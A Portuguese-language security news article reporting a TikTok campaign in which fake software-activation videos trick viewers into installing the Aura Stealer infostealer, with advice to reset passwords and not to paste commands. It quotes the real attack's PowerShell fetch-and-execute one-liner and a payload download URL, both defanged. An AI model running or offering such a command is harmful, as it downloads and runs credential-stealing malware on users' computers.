Os vídeos do TikTok espalham o Aura Stealer por meio de guias de software falsos

Os cibercriminosos estão distribuindo malware para roubo de informações por meio de uma campanha no TikTok, usando vídeos que afirmam falsamente ser guias de ativação gratuitos para softwares populares. A operação em andamento, identificada em 19 de outubro de 2025, usa um método de engenharia social para induzir os usuários a infectarem seus próprios computadores. O manipulador do ISC, Xavier Mertens, relatou a campanha, observando suas semelhanças com uma operação observada pela Trend Micro em maio. Os vídeos do TikTok pretendem oferecer instruções para ativar software legítimo, como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. A campanha também promove serviços fabricados, incluindo “Netflix Premium” e “Spotify Premium”, para atrair um público mais amplo. A técnica de ataque é conhecida como ataque ClickFix, que envolve o fornecimento de instruções aparentemente úteis que enganam os usuários para que executem comandos maliciosos. Os vídeos exibem um comando curto do PowerShell de uma linha e instruem os espectadores a executá-lo com privilégios de administrador. Um exemplo de comando mostrado é iex (irm slmgr[.]win/photoshop). O nome específico do programa no URL, como “photoshop”, é alterado para corresponder ao software representado no vídeo. Quando um usuário executa este comando, o PowerShell se conecta ao site remoto slmgr[.]win. Esta ação recupera e executa um segundo script do PowerShell, que baixa dois arquivos executáveis das páginas da Cloudflare. O primeiro arquivo, baixado de https://file-epq[.]pages[.]dev/updater.exeé uma variante do malware Aura Stealer. O Aura Stealer foi projetado para coletar credenciais salvas de navegadores da web, cookies de autenticação, carteiras de criptomoedas e dados de login de outros aplicativos. Essas informações roubadas são então enviadas aos invasores, concedendo-lhes acesso às contas das vítimas. Uma segunda carga útil, chamada source.exetambém é baixado. Este executável é usado para autocompilar código usando o compilador Visual C# integrado do .NET framework (csc.exe). O código compilado é posteriormente injetado e lançado diretamente na memória. O propósito específico desta segunda carga útil ainda não foi determinado. Os usuários que seguiram as instruções nesses vídeos devem considerar todas as suas credenciais comprometidas e são aconselhados a redefinir imediatamente as senhas de todos os sites e serviços online que utilizam. Os ataques ClickFix tornaram-se significativamente mais comuns no ano passado. Eles são usados para distribuir vários tipos de malware em campanhas relacionadas a ransomware e roubo de criptomoedas. Como prática geral de segurança, os usuários nunca devem copiar texto de um site e executá-lo em uma caixa de diálogo do sistema operacional, incluindo a barra de endereço do File Explorer, prompt de comando, PowerShell, terminal macOS ou shells Linux.

Source: Os vídeos do TikTok espalham o Aura Stealer por meio de guias de software falsos

Os vídeos do TikTok espalham o Aura Stealer por meio de guias de software falsos

Related Stories

Microsoft lança Surface RTX Spark Dev Box para cargas de trabalho avançadas de IA

X lança recurso ‘React with Video’ para usuários iOS

Microsoft lança Projeto Solara para alimentar dispositivos de última geração com agentes pioneiros

Google lança atualização do Android de junho com novos recursos de segurança e compartilhamento